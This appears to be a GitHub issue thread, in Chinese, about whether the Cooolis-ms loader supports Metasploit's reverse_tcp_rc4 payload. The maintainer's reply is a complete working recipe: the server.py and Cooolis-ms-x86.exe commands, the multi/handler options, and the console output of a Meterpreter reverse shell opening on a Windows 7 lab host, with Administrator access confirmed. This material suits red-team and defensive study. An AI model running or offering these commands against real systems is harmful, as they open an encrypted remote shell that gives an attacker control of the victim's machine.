请问 payload 类型支持 reverse_tcp_rc4 吗？

[XhstormR]

例如 windows/x64/meterpreter/reverse_tcp_rc4，我看 loader 里面没有 rc4 的相关内容。

[Rvn0xsy]

将options与Cooolis-ms的-s参数对应即可

Kali Linux

IP: 192.168.3.128

python3 server.py -U msf -P msf -H 127.0.0.1 -p 55553 -s -v -l 8899 -S 192.168.3.128

msfconsole

msf5 exploit(multi/handler) > options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp_rc4):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   EXITFUNC     process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST        192.168.3.128    yes       The listen address (an interface may be specified)
   LPORT        8876             yes       The listen port
   RC4PASSWORD  fsm              yes       Password to derive RC4 key from


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Windows 7

IP: 192.168.3.129

Cooolis-ms-x86.exe -p windows/meterpreter/reverse_tcp_rc4 -s LHOST=192.168.3.128,LPORT=8876,RC4PASSWORD=fsm,EXITFUNC=process -H 192.168.3.128 -P 8899

then...

msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.3.128:8876 
msf5 exploit(multi/handler) > [*] Sending stage (180295 bytes) to 192.168.3.129
[*] Meterpreter session 1 opened (192.168.3.128:8876 -> 192.168.3.129:49298) at 2019-12-08 08:30:50 -0500

msf5 exploit(multi/handler) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > getuid 
Server username: VMWARE-545451\Administrator
meterpreter >